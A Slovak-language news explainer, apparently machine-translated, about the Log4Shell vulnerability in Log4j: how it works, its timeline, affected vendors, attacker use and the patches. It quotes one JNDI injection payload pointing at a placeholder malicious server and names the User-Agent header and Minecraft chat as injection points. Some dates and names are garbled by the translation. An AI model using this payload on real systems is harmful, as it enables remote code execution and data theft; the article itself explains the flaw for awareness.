Čo je Log4Shell, zraniteľnosť, ktorá podpaľuje internet?

Internet sa už niekoľko dní zmieta v súvislosti so zraniteľnosťou v programe Log4j, ktorý je širokej verejnosti neznámy a napriek tomu sa používa vo veľkom množstve softvéru a webových aplikácií. Prečo je táto chyba taká významná? Vysvetľujeme vám.

Čo je Log4Shell?

Od r 9 decembra je kritická zraniteľnosť stredobodom všetkých konverzácií v špecializovaných kruhoch: teraz sa nazýva Log4Shell a nachádza sa v Log4j, nástroji bežne používanom v aplikáciách Java na zaznamenávanie aktivít a chýb. Tento program je vyvinutý a udržiavaný dobrovoľníkmi z Apache Software Foundation, čo vysvetľuje jeho masívne prijatie.

Chyba označená ako „CVE-2021-44228“ získala skóre CVSS 10, čo je maximálne hodnotenie. Toto vysoké skóre závažnosti sa vysvetľuje skutočnosťou, že je triviálne zneužitie, pretože stačí jeden riadok: umiestnením jednoduchého typu inštrukcie ” ${jndi:ldap://malicious-server/resource} na mieste, kde budú tieto údaje log4j (napríklad formulár), si útočník vynúti pripojenie k svojmu serveru cez JNDI, aby získal a spustil uvedený zdroj, často skript. Týmto spôsobom môže spúšťať kód na diaľku a robiť na zraniteľnom serveri, čo chce. Marcus Hutchins, tiež známy ako MalwareTech, zverejnil video, aby demonštroval túto zraniteľnosť.

Medzi najviac medializované príklady využitia tejto chyby môžeme uviesť ten, ktorý ovplyvnil Minecraft. Napísanie príslušnej inštrukcie v chate Minecraft stačí na spustenie kódu na diaľku na serveri, ale aj na počítačoch hráčov prítomných na serveri. Ďalšia ilustrácia sa týka hlavičky User-Agent, ktorá vám okrem iného umožňuje zistiť, z ktorého prehliadača a operačného systému používateľ stránku navštevuje a ktorej obsah je často protokolovaný webovým serverom. Úpravou tejto hlavičky tak, aby zobrazovala inštrukciu namiesto zvyčajných informácií, bude táto inštrukcia “interpretovaná” programom Log4j, keď je zapísaná do protokolu, čo umožňuje získať prístup k zraniteľnému webovému serveru.

Odkedy je zraniteľnosť známa?

Táto chyba zabezpečenia existuje minimálne od septembra 2013 v Log4j. V roku 2016 prezentácia počas podujatia Black Hat 2016 ilustrovala možnosti vzdialeného spúšťania kódu pomocou JNDI, možnosti, ktoré sa vzťahovali na Log4j. Nie je jasné, či si dobrovoľníci v tom čase uvedomovali existenciu zraniteľnosti, no faktom zostáva, že v tom čase nebola opravená.

V tomto prípade bola zraniteľnosť odhalená Apache 24. novembra Chen Zhaojun z Alibaba Cloud. a 8 decembra výskumník upozornil dobrovoľníkov na skutočnosť, že anonymný používateľ odhalil podrobnosti o zraniteľnosti na čínskej blogovacej platforme. a 9 decembra, výskumník publikoval dňa Twitter popis zraniteľnosti a príklad jej využitia. Aj keď sa začalo jeho masívne využívanie, Cloudflare a Cisco uviedli, že videli príklady jeho použitia útočníkmi. 1^ehm a 2 decembra bez toho, aby vedeli, ako sa o jej existencii niektorí aktéri dozvedeli.

Koho ovplyvňuje Log4Shell?

Konkrétne všetky aplikácie a softvér využívajúce Log4j vo verzii od 2.0 pri 2.14.1. Je ťažké vytvoriť úplný zoznam, ale databázy začínajú identifikovať softvér a dodávateľov, ktorí sú alebo nie sú zraniteľní. BleepingComputer tiež vedie zoznam na svojej strane. Známe a potvrdené značky a programy ako zraniteľné zahŕňajú Minecraft, AppleTesla, Steam, TwitterRedis, ElasticSearch a samozrejme Apache.

Agentúra pre kybernetickú bezpečnosť a bezpečnosť infraštruktúry (CISA) varovala, že stovky miliónov systémov sú potenciálne zraniteľné.

Kto využíva túto zraniteľnosť?

Hneď ako bola zraniteľnosť a spôsob jej zneužitia zverejnený, hackeri využili príležitosť a hľadali zraniteľné servery. Niektorí z nich začali infikovať servery ťažiarmi kryptomien. Hackeri stojaci za Kinsing napríklad využívajú túto zraniteľnosť na spúšťanie skriptov, ktoré odstraňujú malvér ich konkurentov a inštalujú si vlastný na ťažbu kryptomien. Ako uvádza Netlab 360, zapojené sú aj botnety Mirai a Muhstik. Microsoft uviedol, že videl útočníkov nasadzovať majáky Cobalt Strike, ktoré hackeri často používajú na inštaláciu ransomvéru.

Zraniteľnosť sa používa aj na exfiltráciu údajov obsiahnutých v premenných prostredia, ako sú tajné kľúče. Zatiaľ nebol nasadený žiadny ransomvér využívajúci túto chybu. Pre väčšinu výskumníkov to však nebude trvať dlho.

Ak je projekt open source, prečo si to nikto neuvedomil skôr?

Často sa hovorí, že projekty s otvoreným zdrojovým kódom sú bezpečnejšie, pretože ich zdrojový kód je verejný, takže ho môže každý skontrolovať a nájsť zraniteľné miesta. V praxi sú niektoré široko používané open source projekty, ako je Log4j, udržiavané iba niekoľkými dobrovoľnými dobrovoľníkmi, pričom väčšina spoločností ich len používa vo svojich produktoch bez toho, aby sa konkrétne podieľali na samotnom projekte.

Pre Log4j sa o jeho údržbu vo voľnom čase staralo šesť dobrovoľníkov. Nikto na ňom nebol na plný úväzok, čo vysvetľuje, prečo takáto chyba mohla zostať nepovšimnutá a prečo vývojárom trvalo niekoľko dní, kým vydali opravu na jej opravu.

Táto situácia nie je nová: v roku 2014 bola kritická chyba Heartbleed výsledkom príspevku dobrovoľného vývojára k projektu OpenSSL, ktorý bol overený, pričom obsahoval chybu na úrovni overenia. V tom čase tento nedostatok poukázal na nedostatok prostriedkov a prispievateľov projektov s otvoreným zdrojovým kódom a dôsledky tohto nedostatku, najmä pre príspevky, ktoré sú masívne využívané. Niekoľko veľkých spoločností vytvorilo schému financovania Core Infrastructure Initiative, aby pomohla financovať veľké open source projekty. Ako však ukazuje Log4Shell, situácia je pre mnohé z týchto projektov stále neistá a z tohto kritického nedostatku zdrojov a dobrovoľníkov naďalej vznikajú značné zraniteľnosti.

Existujú spôsoby, ako opraviť túto zraniteľnosť?

Chyba zabezpečenia bola vo verzii opravená 2.15.0 z Log4j, ale je bezpečnejšie stiahnuť si verziu 2.16.0, ktorý štandardne úplne zakáže JNDI. Bolo zdieľaných niekoľko možných zmiernení v prípade, že je aktualizácia komplikovaná, ako napríklad „vakcína“ vyvinutá výskumníkmi Cybereason, ktorá poskytuje dočasné riešenie pomocou samotnej chyby na vykonávanie zmien na diaľku.

Na strane používateľa nie je čo robiť, len čakať a aktualizovať zraniteľný softvér, keď bude k dispozícii. Napríklad Minecraft vytvoril opravu a poskytuje sprievodcu pre ľudí, ktorí hosťujú svoj vlastný server.

Mám si podpáliť počítač?

Nie, zatiaľ nie, aj keď niet pochýb o tom, že chyba je jednou z najdôležitejších za posledné roky a že ešte nepoznáme všetky dôsledky jej existencie. Na druhej strane, byť opatrný pri používaní internetu a softvéru, ako aj chrániť sa bezpečnostným softvérom, je vždy dobrý nápad.